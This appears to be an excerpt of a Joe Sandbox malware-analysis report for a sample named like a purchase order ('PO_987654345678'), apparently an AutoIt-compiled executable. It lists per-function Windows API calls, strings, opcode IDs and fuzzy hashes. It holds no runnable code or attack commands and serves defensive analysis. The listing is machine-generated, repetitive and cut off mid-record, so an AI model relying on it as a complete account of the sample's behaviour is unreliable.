                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                          • String ID:
                          • API String ID: 4175595110-0
                          • Opcode ID: e7b7f4984f324ee7edcb3ca2f0317157f1a65d7fa42002a3ab75f21c76796237
                          • Instruction ID: ecc790be62444d4ef30713217d3a44df513f342d5acce6449526e17840cf55e2
                          • Opcode Fuzzy Hash: e7b7f4984f324ee7edcb3ca2f0317157f1a65d7fa42002a3ab75f21c76796237
                          • Instruction Fuzzy Hash: D4716A7290021AABDF219FA5DC48FAFBBB8FF15310F144116F919E6191DB319A05EBA0
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8C4BD
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F9CC08,00000000,?,00000000,?,?), ref: 00F8C544
                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F8C5A4
                          • _wcslen.LIBCMT ref: 00F8C5F4
                          • _wcslen.LIBCMT ref: 00F8C66F
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00F8C6B2
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F8C7C1
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F8C84D
                          • RegCloseKey.ADVAPI32(?), ref: 00F8C881
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8C88E
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F8C960
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 9721498-966354055
                          • Opcode ID: f9ab10eb32fa78848a37952fb85c37eacab9e5c9b31c3862f9028a19cb6b1f6c
                          • Instruction ID: 2aaa5d1afabc0709e32e52f335305ed0d494ae9b44af4a9f0c712d9c1eeb0703
                          • Opcode Fuzzy Hash: f9ab10eb32fa78848a37952fb85c37eacab9e5c9b31c3862f9028a19cb6b1f6c
                          • Instruction Fuzzy Hash: 60127D356042019FD714EF14C891A6AB7E5FF88724F18889DF84A9B3A2DB35FC41EB91
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00F909C6
                          • _wcslen.LIBCMT ref: 00F90A01
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F90A54
                          • _wcslen.LIBCMT ref: 00F90A8A
                          • _wcslen.LIBCMT ref: 00F90B06
                          • _wcslen.LIBCMT ref: 00F90B81
                            • Part of subcall function 00F1F9F2: _wcslen.LIBCMT ref: 00F1F9FD
                            • Part of subcall function 00F62BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F62BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$MessageSend$BuffCharUpper
                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                          • API String ID: 1103490817-4258414348
                          • Opcode ID: 0743662d000b3f7602070be81abba03cd8cde86570bac5b22070c65c0c0032a8
                          • Instruction ID: e9a9eb54b717f293eb98627092dcb79cec3160d148dbd953590940111db490a9
                          • Opcode Fuzzy Hash: 0743662d000b3f7602070be81abba03cd8cde86570bac5b22070c65c0c0032a8
                          • Instruction Fuzzy Hash: 57E1B0326083018FCB14EF24C85196AB7E1BF98324F14895DF8969B3A2DB35ED45EB81
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                          • API String ID: 1256254125-909552448
                          • Opcode ID: 6fe8b67297eac3318aaf27ea4411318966379daaa15419ce9d65de7a0a181630
                          • Instruction ID: fc1bad4acceedbae3f0d3b1c36d029bb16c6e910aa18b609a1f427c3d92c3309
                          • Opcode Fuzzy Hash: 6fe8b67297eac3318aaf27ea4411318966379daaa15419ce9d65de7a0a181630
                          • Instruction Fuzzy Hash: 29711733A0056A8BCB14FE7CDD52AFB3391AFA1764B110129F86597285E639CD44B7F0
                          APIs
                          • _wcslen.LIBCMT ref: 00F9835A
                          • _wcslen.LIBCMT ref: 00F9836E
                          • _wcslen.LIBCMT ref: 00F98391
                          • _wcslen.LIBCMT ref: 00F983B4
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F983F2
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F9361A,?), ref: 00F9844E
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F98487
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F984CA
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F98501
                          • FreeLibrary.KERNEL32(?), ref: 00F9850D
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F9851D
                          • DestroyIcon.USER32(?), ref: 00F9852C
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F98549
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F98555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                          • String ID: .dll$.exe$.icl
                          • API String ID: 799131459-1154884017
                          • Opcode ID: 270692f5f1342d2f1e16e320f2d797325958b08966dc5fad614a6dc657cd9ce7
                          • Instruction ID: 412036aaca64caea2f05823dfc788714c74d5642aa689e8012339064b5c7fda3
                          • Opcode Fuzzy Hash: 270692f5f1342d2f1e16e320f2d797325958b08966dc5fad614a6dc657cd9ce7
                          • Instruction Fuzzy Hash: E661CE72900219BAEF14DF64DC41FBE77A8BF09761F10460AF815D60D1DBB8A985EBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 0-1645009161
                          • Opcode ID: 6344090b71fd516ee9f9d44b8de45e36799fd90139c6190716bbf2fc9bcbf2ac
                          • Instruction ID: 618232261f577594579a1b3a55d8f12b33e9467d9c1def3875152ecdfd0c6d37
                          • Opcode Fuzzy Hash: 6344090b71fd516ee9f9d44b8de45e36799fd90139c6190716bbf2fc9bcbf2ac
                          • Instruction Fuzzy Hash: 9481F371E04705BBDB20BF60DC42FAE7BA8AF54740F044065F905AA1D2EB78EA45F7A1
                          APIs
                          • CharLowerBuffW.USER32(?,?), ref: 00F73EF8
                          • _wcslen.LIBCMT ref: 00F73F03
                          • _wcslen.LIBCMT ref: 00F73F5A
                          • _wcslen.LIBCMT ref: 00F73F98
                          • GetDriveTypeW.KERNEL32(?), ref: 00F73FD6
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F7401E
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F74059
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F74087
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 1839972693-4113822522
                          • Opcode ID: 87608b38c123aff734919870c9db167fdf6f02ae801591f93e006406a3c0a01b
                          • Instruction ID: 9e845fb5f9852703dfe64ac44545fe2e21d4694413aa8a71adf989ceebb97e0e
                          • Opcode Fuzzy Hash: 87608b38c123aff734919870c9db167fdf6f02ae801591f93e006406a3c0a01b
                          • Instruction Fuzzy Hash: CA71D2729082129FC710EF24C88196AB7F4EF94764F40892EF599D3291EB34ED45FB92
                          APIs
                          • LoadIconW.USER32(00000063), ref: 00F65A2E
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F65A40
                          • SetWindowTextW.USER32(?,?), ref: 00F65A57
                          • GetDlgItem.USER32(?,000003EA), ref: 00F65A6C
                          • SetWindowTextW.USER32(00000000,?), ref: 00F65A72
                          • GetDlgItem.USER32(?,000003E9), ref: 00F65A82
                          • SetWindowTextW.USER32(00000000,?), ref: 00F65A88
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F65AA9
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F65AC3
                          • GetWindowRect.USER32(?,?), ref: 00F65ACC
                          • _wcslen.LIBCMT ref: 00F65B33
                          • SetWindowTextW.USER32(?,?), ref: 00F65B6F
                          • GetDesktopWindow.USER32 ref: 00F65B75
                          • GetWindowRect.USER32(00000000), ref: 00F65B7C
                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F65BD3
                          • GetClientRect.USER32(?,?), ref: 00F65BE0
                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00F65C05
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F65C2F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                          • String ID:
                          • API String ID: 895679908-0
                          • Opcode ID: 5f75acbd19c6ee72ffff2b4b8b847b1b4ba639eb74a12e428cbb543456add143
                          • Instruction ID: d5310d96eb7c16cf87c9ea9dd6b3a61b1febece79460f73aa4eec5cf98537147
                          • Opcode Fuzzy Hash: 5f75acbd19c6ee72ffff2b4b8b847b1b4ba639eb74a12e428cbb543456add143
                          • Instruction Fuzzy Hash: 40717A31900B09AFDB20DFA8CE85AAEBBF5FF48B14F104519E186B35A0D775E944EB50
                          APIs
                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F200C6
                            • Part of subcall function 00F200ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00FD070C,00000FA0,1D8D2FCA,?,?,?,?,00F423B3,000000FF), ref: 00F2011C
                            • Part of subcall function 00F200ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F423B3,000000FF), ref: 00F20127
                            • Part of subcall function 00F200ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F423B3,000000FF), ref: 00F20138
                            • Part of subcall function 00F200ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F2014E
                            • Part of subcall function 00F200ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F2015C
                            • Part of subcall function 00F200ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F2016A
                            • Part of subcall function 00F200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F20195
                            • Part of subcall function 00F200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F201A0
                          • ___scrt_fastfail.LIBCMT ref: 00F200E7
                            • Part of subcall function 00F200A3: __onexit.LIBCMT ref: 00F200A9
                          Strings
                          • SleepConditionVariableCS, xrefs: 00F20154
                          • kernel32.dll, xrefs: 00F20133
                          • WakeAllConditionVariable, xrefs: 00F20162
                          • InitializeConditionVariable, xrefs: 00F20148
                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F20122
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                          • API String ID: 66158676-1714406822
                          • Opcode ID: 6b9910bbb04120fa17e7062ff36705db842980222b4027e0aa8bfee1ea395b51
                          • Instruction ID: 1e4e695fa3d425879b156c2881901cbbe13fb62f95a49e6ebe29dd867d4b3d85
                          • Opcode Fuzzy Hash: 6b9910bbb04120fa17e7062ff36705db842980222b4027e0aa8bfee1ea395b51
                          • Instruction Fuzzy Hash: E221F333A457256BEB106BB4BC06B6E37A4EB05B61F10013BF905EB292DF64D840BAD5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 176396367-1603158881
                          • Opcode ID: 77609b0bdf4948b6b76bf1861db070cdb1b20b21c8e26c745d6bf8d3896e53f8
                          • Instruction ID: 9add83ea85e06f951b325824fa72d96544b731cf24bbf8d5b2632999c95cf5a5
                          • Opcode Fuzzy Hash: 77609b0bdf4948b6b76bf1861db070cdb1b20b21c8e26c745d6bf8d3896e53f8
                          • Instruction Fuzzy Hash: 87E1A532E005269BCB18DFA4C852BEDFBB4BF54720F548119E456E7281DF70AE85B790
                          APIs
                          • CharLowerBuffW.USER32(00000000,00000000,00F9CC08), ref: 00F74527
                          • _wcslen.LIBCMT ref: 00F7453B
                          • _wcslen.LIBCMT ref: 00F74599
                          • _wcslen.LIBCMT ref: 00F745F4
                          • _wcslen.LIBCMT ref: 00F7463F
                          • _wcslen.LIBCMT ref: 00F746A7
                            • Part of subcall function 00F1F9F2: _wcslen.LIBCMT ref: 00F1F9FD
                          • GetDriveTypeW.KERNEL32(?,00FC6BF0,00000061), ref: 00F74743
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharDriveLowerType
                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                          • API String ID: 2055661098-1000479233
                          • Opcode ID: 7451534deade88791bb2ccad1155fa466dc248cb599c9b5bb8e4d41e984e8566
                          • Instruction ID: d1fe1ef0ca833cef23481ac5f05ce0176d7f4044ad26b1dca17f427eaf510cb9
                          • Opcode Fuzzy Hash: 7451534deade88791bb2ccad1155fa466dc248cb599c9b5bb8e4d41e984e8566
                          • Instruction Fuzzy Hash: 7DB1E331A083029FC714DF28CC91A6AF7E5AF95720F54891EF49AC7291D734E845EB93
                          APIs
                          • _wcslen.LIBCMT ref: 00F8B198
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F8B1B0
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F8B1D4
                          • _wcslen.LIBCMT ref: 00F8B200
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F8B214
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F8B236
                          • _wcslen.LIBCMT ref: 00F8B332
                            • Part of subcall function 00F705A7: GetStdHandle.KERNEL32(000000F6), ref: 00F705C6
                          • _wcslen.LIBCMT ref: 00F8B34B
                          • _wcslen.LIBCMT ref: 00F8B366
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F8B3B6
                          • GetLastError.KERNEL32(00000000), ref: 00F8B407
                          • CloseHandle.KERNEL32(?), ref: 00F8B439
                          • CloseHandle.KERNEL32(00000000), ref: 00F8B44A
                          • CloseHandle.KERNEL32(00000000), ref: 00F8B45C
                          • CloseHandle.KERNEL32(00000000), ref: 00F8B46E
                          • CloseHandle.KERNEL32(?), ref: 00F8B4E3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                          • String ID:
                          • API String ID: 2178637699-0
                          • Opcode ID: e44c8820737e74c5285f669ad59df1becf1c1cd23a304c7aaa7542760c9adee8
                          • Instruction ID: bfa7700d4d0aa9f5871b2cea000a856c5dac12a9eeab9435a4ecc921ad7a91cf
                          • Opcode Fuzzy Hash: e44c8820737e74c5285f669ad59df1becf1c1cd23a304c7aaa7542760c9adee8
                          • Instruction Fuzzy Hash: F4F1BF31908300DFC714EF24C891BAEBBE1AF85324F18855DF4999B2A2CB35EC45EB52
                          APIs
                          • GetMenuItemCount.USER32(00FD1990), ref: 00F42F8D
                          • GetMenuItemCount.USER32(00FD1990), ref: 00F4303D
                          • GetCursorPos.USER32(?), ref: 00F43081
                          • SetForegroundWindow.USER32(00000000), ref: 00F4308A
                          • TrackPopupMenuEx.USER32(00FD1990,00000000,?,00000000,00000000,00000000), ref: 00F4309D
                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F430A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                          • String ID: 0
                          • API String ID: 36266755-4108050209
                          • Opcode ID: a31ecf4cf365bbf2d726584677a1d19e5393c392cd85bd7ac4c39c6360990261
                          • Instruction ID: c16a3d549dfce86e973f90cdb5b4e2e7a0512e76eca4b6b45ae4e6de6fb03f0f
                          • Opcode Fuzzy Hash: a31ecf4cf365bbf2d726584677a1d19e5393c392cd85bd7ac4c39c6360990261
                          • Instruction Fuzzy Hash: B371F731A44205BFEB218F64CC49F9ABF68FF05334F604216F914AA1E0C7B1A954FB91
                          APIs
                          • DestroyWindow.USER32(?,?), ref: 00F96DEB
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F96E5F
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F96E81
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F96E94
                          • DestroyWindow.USER32(?), ref: 00F96EB5
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F00000,00000000), ref: 00F96EE4
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F96EFD
                          • GetDesktopWindow.USER32 ref: 00F96F16
                          • GetWindowRect.USER32(00000000), ref: 00F96F1D
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F96F35
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F96F4D
                            • Part of subcall function 00F19944: GetWindowLongW.USER32(?,000000EB), ref: 00F19952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                          • String ID: 0$tooltips_class32
                          • API String ID: 2429346358-3619404913
                          • Opcode ID: dcd364f7b3f794e794683fe6a9c04a75c6a3e65d0ca5c809027db90468ea1f5b
                          • Instruction ID: f5c5564eb306a610b7a9b037b6eb02d4f2c023662fc02faaaf85696cf7acd639
                          • Opcode Fuzzy Hash: dcd364f7b3f794e794683fe6a9c04a75c6a3e65d0ca5c809027db90468ea1f5b
                          • Instruction Fuzzy Hash: B5717570504244AFEB20DF28DC54BBABBE9FB89314F44041EF989C7261D771E906EB16
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • DragQueryPoint.SHELL32(?,?), ref: 00F99147
                            • Part of subcall function 00F97674: ClientToScreen.USER32(?,?), ref: 00F9769A
                            • Part of subcall function 00F97674: GetWindowRect.USER32(?,?), ref: 00F97710
                            • Part of subcall function 00F97674: PtInRect.USER32(?,?,00F98B89), ref: 00F97720
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00F991B0
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F991BB
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F991DE
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F99225
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00F9923E
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00F99255
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00F99277
                          • DragFinish.SHELL32(?), ref: 00F9927E
                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F99371
                          Strings
                          Memory Dump Source
